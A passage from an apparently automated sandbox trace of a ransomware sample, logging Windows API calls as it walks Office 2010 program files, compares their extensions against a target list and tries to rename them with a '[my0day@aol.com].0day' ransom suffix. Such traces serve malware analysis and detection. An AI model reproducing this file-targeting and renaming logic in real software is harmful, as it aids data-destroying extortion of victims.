lstrlenW (lpString=".7z") returned 3 [0266.469] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.469] lstrlenW (lpString=".dbf") returned 4 [0266.470] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString=".1cd") returned 4 [0266.470] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString=".jpg") returned 4 [0266.470] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString=".doc") returned 4 [0266.470] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.470] lstrlenW (lpString=".docx") returned 5 [0266.470] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.470] lstrlenW (lpString=".pdf") returned 4 [0266.470] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.470] lstrlenW (lpString=".xls") returned 4 [0266.470] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.470] lstrlenW (lpString=".xlsx") returned 5 [0266.470] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.470] lstrlenW (lpString=".ppt") returned 4 [0266.470] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString=".zip") returned 4 [0266.470] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.470] lstrlenW (lpString=".rar") returned 4 [0266.470] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.470] lstrlenW (lpString=".bz2") returned 4 [0266.470] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.470] lstrlenW (lpString=".7z") returned 3 [0266.470] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString=".dbf") returned 4 [0266.470] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.470] lstrlenW (lpString=".1cd") returned 4 [0266.470] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.471] lstrlenW (lpString=".jpg") returned 4 [0266.471] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.471] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0266.471] lstrlenW (lpString="OSETUP.DLL") returned 10 [0266.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0267.444] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=7379816) returned 1 [0267.444] CloseHandle (hObject=0x300) returned 1 [0267.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll")) returned 0x20 [0267.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0267.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.707] lstrlenW (lpString=".doc") returned 4 [0267.707] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0267.707] lstrlenW (lpString=".docx") returned 5 [0267.707] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0267.707] lstrlenW (lpString=".pdf") returned 4 [0267.707] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0267.707] lstrlenW (lpString=".xls") returned 4 [0267.707] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0267.707] lstrlenW (lpString=".xlsx") returned 5 [0267.708] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0267.708] lstrlenW (lpString=".ppt") returned 4 [0267.708] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0267.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.708] lstrlenW (lpString=".zip") returned 4 [0267.708] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0267.708] lstrlenW (lpString=".rar") returned 4 [0267.708] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0267.708] lstrlenW (lpString=".bz2") returned 4 [0267.708] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0267.708] lstrlenW (lpString=".7z") returned 3 [0267.708] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0267.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.708] lstrlenW (lpString=".dbf") returned 4 [0267.708] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0267.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.708] lstrlenW (lpString=".1cd") returned 4 [0267.708] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0267.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.708] lstrlenW (lpString=".jpg") returned 4 [0267.708] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0267.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.708] lstrlenW (lpString=".doc") returned 4 [0267.708] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0267.708] lstrlenW (lpString=".docx") returned 5 [0267.708] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0267.708] lstrlenW (lpString=".pdf") returned 4 [0267.709] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0267.709] lstrlenW (lpString=".xls") returned 4 [0267.709] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0267.709] lstrlenW (lpString=".xlsx") returned 5 [0267.709] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0267.709] lstrlenW (lpString=".ppt") returned 4 [0267.709] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0267.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.709] lstrlenW (lpString=".zip") returned 4 [0267.709] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0267.709] lstrlenW (lpString=".rar") returned 4 [0267.709] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0267.709] lstrlenW (lpString=".bz2") returned 4 [0267.709] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0267.709] lstrlenW (lpString=".7z") returned 3 [0267.709] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0267.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.709] lstrlenW (lpString=".dbf") returned 4 [0267.709] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0267.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.709] lstrlenW (lpString=".1cd") returned 4 [0267.709] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0267.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 90 [0267.709] lstrlenW (lpString=".jpg") returned 4 [0267.709] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0267.709] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0267.709] lstrlenW (lpString="pkeyconfig.companion.dll") returned 24 [0267.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.710] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=15736) returned 1 [0267.710] CloseHandle (hObject=0x2f8) returned 1 [0267.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll")) returned 0x20 [0267.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.712] lstrlenW (lpString=".doc") returned 4 [0267.712] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0267.712] lstrlenW (lpString=".docx") returned 5 [0267.712] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0267.712] lstrlenW (lpString=".pdf") returned 4 [0267.712] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0267.712] lstrlenW (lpString=".xls") returned 4 [0267.712] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0267.712] lstrlenW (lpString=".xlsx") returned 5 [0267.713] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0267.713] lstrlenW (lpString=".ppt") returned 4 [0267.713] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.713] lstrlenW (lpString=".zip") returned 4 [0267.713] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString=".rar") returned 4 [0267.713] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString=".bz2") returned 4 [0267.713] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0267.713] lstrlenW (lpString=".7z") returned 3 [0267.713] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0267.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.713] lstrlenW (lpString=".dbf") returned 4 [0267.713] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0267.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.713] lstrlenW (lpString=".1cd") returned 4 [0267.713] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0267.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.713] lstrlenW (lpString=".jpg") returned 4 [0267.713] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.713] lstrlenW (lpString=".doc") returned 4 [0267.713] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString=".docx") returned 5 [0267.713] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0267.713] lstrlenW (lpString=".pdf") returned 4 [0267.713] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString=".xls") returned 4 [0267.713] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0267.713] lstrlenW (lpString=".xlsx") returned 5 [0267.713] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0267.713] lstrlenW (lpString=".ppt") returned 4 [0267.714] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0267.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.714] lstrlenW (lpString=".zip") returned 4 [0267.714] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0267.714] lstrlenW (lpString=".rar") returned 4 [0267.714] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0267.714] lstrlenW (lpString=".bz2") returned 4 [0267.714] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0267.714] lstrlenW (lpString=".7z") returned 3 [0267.714] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0267.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.714] lstrlenW (lpString=".dbf") returned 4 [0267.714] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0267.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.714] lstrlenW (lpString=".1cd") returned 4 [0267.714] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0267.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0267.714] lstrlenW (lpString=".jpg") returned 4 [0267.714] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0267.714] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0267.714] lstrlenW (lpString="Setup.exe") returned 9 [0267.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.762] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=1377144) returned 1 [0267.762] CloseHandle (hObject=0x2f8) returned 1 [0267.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe")) returned 0x20 [0267.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.762] lstrlenW (lpString=".doc") returned 4 [0267.762] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0267.762] lstrlenW (lpString=".docx") returned 5 [0267.762] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0267.763] lstrlenW (lpString=".pdf") returned 4 [0267.763] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0267.763] lstrlenW (lpString=".xls") returned 4 [0267.763] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0267.763] lstrlenW (lpString=".xlsx") returned 5 [0267.763] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0267.763] lstrlenW (lpString=".ppt") returned 4 [0267.763] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0267.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.763] lstrlenW (lpString=".zip") returned 4 [0267.763] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0267.763] lstrlenW (lpString=".rar") returned 4 [0267.763] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0267.763] lstrlenW (lpString=".bz2") returned 4 [0267.763] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0267.763] lstrlenW (lpString=".7z") returned 3 [0267.763] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0267.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.763] lstrlenW (lpString=".dbf") returned 4 [0267.763] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0267.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.763] lstrlenW (lpString=".1cd") returned 4 [0267.763] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0267.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.763] lstrlenW (lpString=".jpg") returned 4 [0267.763] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0267.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.764] lstrlenW (lpString=".doc") returned 4 [0267.764] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0267.764] lstrlenW (lpString=".docx") returned 5 [0267.764] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0267.764] lstrlenW (lpString=".pdf") returned 4 [0267.764] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0267.764] lstrlenW (lpString=".xls") returned 4 [0267.764] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0267.764] lstrlenW (lpString=".xlsx") returned 5 [0267.764] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0267.764] lstrlenW (lpString=".ppt") returned 4 [0267.764] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0267.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.764] lstrlenW (lpString=".zip") returned 4 [0267.764] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0267.764] lstrlenW (lpString=".rar") returned 4 [0267.764] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0267.764] lstrlenW (lpString=".bz2") returned 4 [0267.764] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0267.764] lstrlenW (lpString=".7z") returned 3 [0267.764] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0267.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.764] lstrlenW (lpString=".dbf") returned 4 [0267.764] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0267.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.764] lstrlenW (lpString=".1cd") returned 4 [0267.764] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0267.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 89 [0267.764] lstrlenW (lpString=".jpg") returned 4 [0267.764] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0267.765] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0267.765] lstrlenW (lpString="OPHPROXY.DLL") returned 12 [0267.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.810] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=19848) returned 1 [0267.810] CloseHandle (hObject=0x2f8) returned 1 [0267.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll")) returned 0x20 [0267.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.810] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.811] lstrlenW (lpString=".doc") returned 4 [0267.811] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0267.811] lstrlenW (lpString=".docx") returned 5 [0267.811] lstrcmpiW (lpString1=".docx", lpString2="Y.DLL") returned -1 [0267.811] lstrlenW (lpString=".pdf") returned 4 [0267.811] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0267.811] lstrlenW (lpString=".xls") returned 4 [0267.811] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0267.811] lstrlenW (lpString=".xlsx") returned 5 [0267.811] lstrcmpiW (lpString1=".xlsx", lpString2="Y.DLL") returned -1 [0267.811] lstrlenW (lpString=".ppt") returned 4 [0267.811] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0267.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.811] lstrlenW (lpString=".zip") returned 4 [0267.811] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0267.811] lstrlenW (lpString=".rar") returned 4 [0267.811] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0267.811] lstrlenW (lpString=".bz2") returned 4 [0267.811] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0267.811] lstrlenW (lpString=".7z") returned 3 [0267.811] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0267.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.811] lstrlenW (lpString=".dbf") returned 4 [0267.811] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0267.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.811] lstrlenW (lpString=".1cd") returned 4 [0267.811] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0267.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.811] lstrlenW (lpString=".jpg") returned 4 [0267.811] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.812] lstrlenW (lpString=".doc") returned 4 [0267.812] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString=".docx") returned 5 [0267.812] lstrcmpiW (lpString1=".docx", lpString2="Y.DLL") returned -1 [0267.812] lstrlenW (lpString=".pdf") returned 4 [0267.812] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString=".xls") returned 4 [0267.812] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString=".xlsx") returned 5 [0267.812] lstrcmpiW (lpString1=".xlsx", lpString2="Y.DLL") returned -1 [0267.812] lstrlenW 